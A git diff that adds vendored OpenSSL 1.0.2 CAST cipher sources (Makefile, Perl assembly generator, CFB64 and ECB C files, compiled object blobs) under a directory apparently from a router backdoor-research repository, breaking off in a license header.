+c_cfb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_cfb64.o: c_cfb64.c cast_lcl.h
+c_ecb.o: ../../e_os.h ../../include/openssl/cast.h
+c_ecb.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ecb.o: ../../include/openssl/opensslv.h c_ecb.c cast_lcl.h
+c_enc.o: ../../e_os.h ../../include/openssl/cast.h
+c_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_enc.o: c_enc.c cast_lcl.h
+c_ofb64.o: ../../e_os.h ../../include/openssl/cast.h
+c_ofb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ofb64.o: c_ofb64.c cast_lcl.h
+c_skey.o: ../../e_os.h ../../include/openssl/cast.h
+c_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+c_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_skey.o: c_skey.c cast_lcl.h cast_s.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.save
new file mode 100644
index 0000000..f3f4859
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/Makefile.save
@@ -0,0 +1,102 @@
+#
+# OpenSSL/crypto/cast/Makefile
+#
+
+DIR=	cast
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CAST_ENC=c_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=casttest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=c_skey.c c_ecb.c c_enc.c c_cfb64.c c_ofb64.c 
+LIBOBJ=c_skey.o c_ecb.o $(CAST_ENC) c_cfb64.o c_ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= cast.h
+HEADER=	cast_s.h cast_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cast-586.s:	asm/cast-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL)	asm/cast-586.pl $(PERLASM_SCHEME) $(CLAGS) $(PROCESSOR) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+c_cfb64.o: ../../e_os.h ../../include/openssl/cast.h
+c_cfb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_cfb64.o: c_cfb64.c cast_lcl.h
+c_ecb.o: ../../e_os.h ../../include/openssl/cast.h
+c_ecb.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ecb.o: ../../include/openssl/opensslv.h c_ecb.c cast_lcl.h
+c_enc.o: ../../e_os.h ../../include/openssl/cast.h
+c_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_enc.o: c_enc.c cast_lcl.h
+c_ofb64.o: ../../e_os.h ../../include/openssl/cast.h
+c_ofb64.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+c_ofb64.o: c_ofb64.c cast_lcl.h
+c_skey.o: ../../e_os.h ../../include/openssl/cast.h
+c_skey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+c_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_skey.o: c_skey.c cast_lcl.h cast_s.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/cast-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/cast-586.pl
new file mode 100644
index 0000000..bf6810d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/cast-586.pl
@@ -0,0 +1,177 @@
+#!/usr/local/bin/perl
+
+# define for pentium pro friendly version
+$ppro=1;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+require "cbc.pl";
+
+&asm_init($ARGV[0],"cast-586.pl",$ARGV[$#ARGV] eq "386");
+
+$CAST_ROUNDS=16;
+$L="edi";
+$R="esi";
+$K="ebp";
+$tmp1="ecx";
+$tmp2="ebx";
+$tmp3="eax";
+$tmp4="edx";
+$S1="CAST_S_table0";
+$S2="CAST_S_table1";
+$S3="CAST_S_table2";
+$S4="CAST_S_table3";
+
+@F1=("add","xor","sub");
+@F2=("xor","sub","add");
+@F3=("sub","add","xor");
+
+&CAST_encrypt("CAST_encrypt",1);
+&CAST_encrypt("CAST_decrypt",0);
+&cbc("CAST_cbc_encrypt","CAST_encrypt","CAST_decrypt",1,4,5,3,-1,-1);
+
+&asm_finish();
+
+sub CAST_encrypt {
+    local($name,$enc)=@_;
+
+    local($win_ex)=<<"EOF";
+EXTERN	_CAST_S_table0:DWORD
+EXTERN	_CAST_S_table1:DWORD
+EXTERN	_CAST_S_table2:DWORD
+EXTERN	_CAST_S_table3:DWORD
+EOF
+    &main::external_label(
+			  "CAST_S_table0",
+			  "CAST_S_table1",
+			  "CAST_S_table2",
+			  "CAST_S_table3",
+			  );
+
+    &function_begin_B($name,$win_ex);
+
+    &comment("");
+
+    &push("ebp");
+    &push("ebx");
+    &mov($tmp2,&wparam(0));
+    &mov($K,&wparam(1));
+    &push("esi");
+    &push("edi");
+
+    &comment("Load the 2 words");
+    &mov($L,&DWP(0,$tmp2,"",0));
+    &mov($R,&DWP(4,$tmp2,"",0));
+
+    &comment('Get short key flag');
+    &mov($tmp3,&DWP(128,$K,"",0));
+    if($enc) {
+	&push($tmp3);
+    } else {
+	&or($tmp3,$tmp3);
+	&jnz(&label('cast_dec_skip'));
+    }
+
+    &xor($tmp3,	$tmp3);
+
+    # encrypting part
+
+    if ($enc) {
+	&E_CAST( 0,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 1,$S,$R,$L,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 2,$S,$L,$R,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 3,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 4,$S,$L,$R,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 5,$S,$R,$L,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 6,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 7,$S,$R,$L,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 8,$S,$L,$R,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 9,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(10,$S,$L,$R,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(11,$S,$R,$L,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&comment('test short key flag');
+	&pop($tmp4);
+	&or($tmp4,$tmp4);
+	&jnz(&label('cast_enc_done'));
+	&E_CAST(12,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(13,$S,$R,$L,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(14,$S,$L,$R,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(15,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+    } else {
+	&E_CAST(15,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(14,$S,$R,$L,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(13,$S,$L,$R,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(12,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&set_label('cast_dec_skip');
+	&E_CAST(11,$S,$L,$R,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST(10,$S,$R,$L,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 9,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 8,$S,$R,$L,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 7,$S,$L,$R,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 6,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 5,$S,$L,$R,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 4,$S,$R,$L,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 3,$S,$L,$R,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 2,$S,$R,$L,$K,@F3,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 1,$S,$L,$R,$K,@F2,$tmp1,$tmp2,$tmp3,$tmp4);
+	&E_CAST( 0,$S,$R,$L,$K,@F1,$tmp1,$tmp2,$tmp3,$tmp4);
+    }
+
+    &set_label('cast_enc_done') if $enc;
+# Why the nop? - Ben 17/1/99
+    &nop();
+    &mov($tmp3,&wparam(0));
+    &mov(&DWP(4,$tmp3,"",0),$L);
+    &mov(&DWP(0,$tmp3,"",0),$R);
+    &function_end($name);
+}
+
+sub E_CAST {
+    local($i,$S,$L,$R,$K,$OP1,$OP2,$OP3,$tmp1,$tmp2,$tmp3,$tmp4)=@_;
+    # Ri needs to have 16 pre added.
+
+    &comment("round $i");
+    &mov(	$tmp4,		&DWP($i*8,$K,"",1));
+
+    &mov(	$tmp1,		&DWP($i*8+4,$K,"",1));
+    &$OP1(	$tmp4,		$R);
+
+    &rotl(	$tmp4,		&LB($tmp1));
+
+    if ($ppro) {
+	&mov(	$tmp2,		$tmp4);		# B
+	&xor(	$tmp1,		$tmp1);
+	
+	&movb(	&LB($tmp1),	&HB($tmp4));	# A
+	&and(	$tmp2,		0xff);
+
+	&shr(	$tmp4,		16); 		#
+	&xor(	$tmp3,		$tmp3);
+    } else {
+	&mov(	$tmp2,		$tmp4);		# B
+	&movb(	&LB($tmp1),	&HB($tmp4));	# A	# BAD BAD BAD
+	
+	&shr(	$tmp4,		16); 		#
+	&and(	$tmp2,		0xff);
+    }
+
+    &movb(	&LB($tmp3),	&HB($tmp4));	# C	# BAD BAD BAD
+    &and(	$tmp4,		0xff);		# D
+
+    &mov(	$tmp1,		&DWP($S1,"",$tmp1,4));
+    &mov(	$tmp2,		&DWP($S2,"",$tmp2,4));
+
+    &$OP2(	$tmp1,		$tmp2);
+    &mov(	$tmp2,		&DWP($S3,"",$tmp3,4));
+
+    &$OP3(	$tmp1,		$tmp2);
+    &mov(	$tmp2,		&DWP($S4,"",$tmp4,4));
+
+    &$OP1(	$tmp1,		$tmp2);
+    # XXX
+
+    &xor(	$L,		$tmp1);
+    # XXX
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/readme b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/readme
new file mode 100644
index 0000000..fbcd762
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/asm/readme
@@ -0,0 +1,7 @@
+There is a ppro flag in cast-586 which turns on/off
+generation of pentium pro/II friendly code
+
+This flag makes the inner loop one cycle longer, but generates 
+code that runs %30 faster on the pentium pro/II, while only %7 slower
+on the pentium.  By default, this flag is on.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.c
new file mode 100644
index 0000000..f2f16e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.c
@@ -0,0 +1,123 @@
+/* crypto/cast/c_cfb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/cast.h>
+#include "cast_lcl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void CAST_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, const CAST_KEY *schedule,
+                        unsigned char *ivec, int *num, int enc)
+{
+    register CAST_LONG v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    CAST_LONG ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = ivec;
+    if (enc) {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                CAST_encrypt((CAST_LONG *)ti, schedule);
+                iv = ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = ivec;
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                n2l(iv, v0);
+                ti[0] = v0;
+                n2l(iv, v1);
+                ti[1] = v1;
+                CAST_encrypt((CAST_LONG *)ti, schedule);
+                iv = ivec;
+                t = ti[0];
+                l2n(t, iv);
+                t = ti[1];
+                l2n(t, iv);
+                iv = ivec;
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = t = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_cfb64.o
new file mode 100644
index 0000000000000000000000000000000000000000..25b030f121c06af77cd6876b955899d8c48e2725
GIT binary patch
literal 2000
zcmbtT%}*0i5PzlRL%?k@L@^lB!)j`jO$&rC6Vq2{*_u@nX!W3VX-lyNT1eSOFhmbk
z!%|WH0TbiNf5C$Z2^ft=E*?F4@$2G8JQ$NYv-=(_b-BnSvorI1^P4yCz1iDgB~s&X
z5H1dKmh40vC1lOD;|C2lNDh)_^26Qnn_i0Q6?!qMZ_)U9{Vk0}^`CJ?e=#nXzWQkS
z=%ieB9rpoA)`!Kmz`DHZI$T;3Cy2bdBzk1sCA#lChh=3z1n(Jmci$I#%W<OUzhr$$
zY;eEUW1^=VcNtFWN8G;*h+H-o;~2HVV%#OC-_aF!w6a;*kR6|+m6xRt^<9m0SrIGC
zjb9$^r|=uPa)cHBWEKvt1eRL@-|2EptSDzhvG|zk2_l!_l#_C|d1kHFXjd+6`YtEv
z6`G(|sk%W%hK2^czIdvb*NWZ&sax`Q2KtId7`WBtm;5~^O&HG#g4gc>tpy#q5GOT+
ztRv<GMQJq+aoijujs=gSy}7<&4IWYf{1{v7!-tIso`*GIq3wY)EO=L4VZnF5c3AM=
zs~Z;jOZCITgtN&Z^i#o41z$+;hJ?0|;0Xy0tj1mjOS{Ooiru=?cA~I%-u-Tt(>U#J
z3?nD0`xi9u`aN*_uARm$?xr+Bc*xSHaaVwKfa1MZOAi2cINbv$X*E5S>g|!zWQdN(
z%s|cL(}l%3ji@8aXoxE6Xe2Toj;S#kQo^d4xSgWTYsvJqn$AwEQ_1Tytf3;aI16}&
zKNVB9_P|AaC=kqV2Icu)@KIo{3^fA$Nb`$1EtvwV6-=AuULiA+l(fu(Mx@E4mLyVY
zex69_*<3D@2P{9UWh9u@PNQ)aU&|Mzxx(yRrl2hn$*7RYs#AqzF0;MmejG25@rc!v
z5(Er|zpELUx!gzF4vKdZ1hvXK8&#QsjbL#fK4EPPKf&<o$-cqvouzG?YWOs)V9o#K
z2Y`z;{h(Ii`=7Fc;Pd^t9kgK9)F(W_3fknJ0}TI0oFl6|Wqhv{1fSm@hg0BSYBm2A
z<7asyv(@|r;CAoVfFKBeCwxETaz4lH_C}tcHPp}gz<=$44Ii=Uw*!b|890W4MOe9Q
Sqy;=XzL)jS|9eiT=KlqFp7Fi_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.c
new file mode 100644
index 0000000..4793f28
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.c
@@ -0,0 +1,83 @@
+/* crypto/cast/c_ecb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/cast.h>
+#include "cast_lcl.h"
+#include <openssl/opensslv.h>
+
+const char CAST_version[] = "CAST" OPENSSL_VERSION_PTEXT;
+
+void CAST_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      const CAST_KEY *ks, int enc)
+{
+    CAST_LONG l, d[2];
+
+    n2l(in, l);
+    d[0] = l;
+    n2l(in, l);
+    d[1] = l;
+    if (enc)
+        CAST_encrypt(d, ks);
+    else
+        CAST_decrypt(d, ks);
+    l = d[0];
+    l2n(l, out);
+    l = d[1];
+    l2n(l, out);
+    l = d[0] = d[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..add95062a0767a6ecf0495265f89db156e03d614
GIT binary patch
literal 1968
zcmbtUPiqrV5P!*TP1H6`i-%%G-XUs5`$$rytzb!-rddj`(4-(#ST>ujsckl4vys+=
z3dKXn#gE_@@b0mo2mJzmg$jC5dK00}?7r8$Znqcx!R*ZZ-pssz^Y&G-yc~^0h(Lra
zkbx&yLelEM&Ut2zB*+Lk8omCzqV<ln-dAn^N3yQ<)f-bVuJx8u@ytO#_U6mz=boDC
zmsG8H2<B2sbz|SK!uKIh_0<&6N*@M57gP<bcwL+E>$rZ9w*M))@zI<2^rw)oRB79A
zT-w^Ct8L4!RLV5N(kx4}S-N7_G@H)cC!|y;JfKtSwXW@U={%cZ>FLaD*K;#3vuT#T
zciX3VdE9OiWC*16Xq`j}IY3SUL0s__iM&`Nk=<luayS-$3kP=%coakvKgC3HKf02j
z(I<&yJ`qPM40z@$`E?vNri9)Iu0^cobd~~@!k~D&IXj||*jW-7g@i9xAs5eyzi@`f
z$Z=`?-kAV*6$H;Wh%^vk{KIqjm2>zF;K!u>-U8o)sas}^nFJdLP2I9hXRqxNy;NRZ
z%$N1m<>gATs#o)i<)Y5Rc!-x%w|KnXaSd}@Hyhjfrm?l-hd#HQ&Q{ANvwS+diD8gG
z$37M$enjF;iBCv8<vjEs_TT`lv)6Qu8etvR@pVI3j<sVj*V=Uns~fICSgq3`%xU?K
z*=jZ|8^-LGYcc5UX>T9ge`<GG+iA5e$K8V*tYkIxO~+_jgSr31qL7Qd9_*AHa0t;K
zzURjZ8}%dzo@ow5#$)~zG)`Uyjq`{Op5XjV&Ie!4dp;giSVP8LaIogT=4T)mYo5AG
z@DD%`Cw=O>gmNv^JQ$dd??lESckaj}*kb)cFG`#oIxYfaG9-2lIQ&}#*FVAYDU8Vw
z=P$TtU|?u4e~#zRi9oJ{`PhYF_y3Mxh`49GfBg4|e8Gp!jZ?Mx{I9vjH+v~0A8Q8h
e9w_pYZ>WKe1YYih83QXU{{tu8lStnP=KlqzIJL+C

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.c
new file mode 100644
index 0000000..6e1d50f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.c
@@ -0,0 +1,200 @@
+/* crypto/cast/c_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
